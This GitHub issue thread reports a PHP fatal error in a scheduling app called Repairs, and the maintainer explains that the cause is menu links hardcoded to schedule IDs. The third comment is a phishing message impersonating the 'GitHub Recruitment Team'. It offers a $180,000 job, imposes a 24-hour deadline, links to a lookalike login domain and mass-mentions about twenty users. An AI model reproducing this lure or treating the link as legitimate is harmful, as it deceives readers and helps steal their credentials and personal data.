### ISSUE TITLE
Fix that menu items for schedules are hardcoded in the template

### ISSUE THREAD

**Issue by socrat3** [tanius/repairs#1]
Hi,

I have installed Repairs in my server .... but i have this error:

Fatal error: Call to a member function GetIsCalendarSubscriptionAllowed() on null in /web/htdocs/debiancool_777/home/macchine/lib/Application/Schedule/CalendarSubscriptionService.php on line 251

when i click on

127.0.0.1/Web/calendar.php?sid=8

Thx

**Comment by tanius** [comment]
Yes. That is because we use hardcoded links to schedules for the "Schedules → …" (or in German "Werkstattpläne → …") menu items. The link you tried goes to a schedule with ID 8 (`?sid=8`) and that schedule does not exist (yet).

You can create new schedules under "Admin → Schedules" (or in German "Admin → Werkstattpläne"), see `/Web/admin/manage_schedules.php`. And then, if you want to use the same mechanism of hardcoding menu items to your schedules, you would adapt the menu entries in file [`tpl/globalheader.tpl`](https://github.com/tanius/repairs/blob/master/tpl/globalheader.tpl).

This hardcoding of links to specific schedules is obviously just a quick fix. Ideally, we would create a GUI mechanism for that, or just create a menu entry for each schedule automatically. So I keep this issue open to remind us that we should do this some day …

**Comment by Pranjalm-23** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
ayinot, @frank-lim-partior, @EmanHerawy, @pacimahoro, @Admin1993, @briwilcox, @SiYuanHan, @lll-lll-lll-lll, @derbl4ck, @chriba-eth, @kokrange, @walkre-niboshi, @dongjing007, @afantee, @billly123, @xivic-homium, @Ashishc07, @yjjnls, @tammypetro, @tommy-kwok
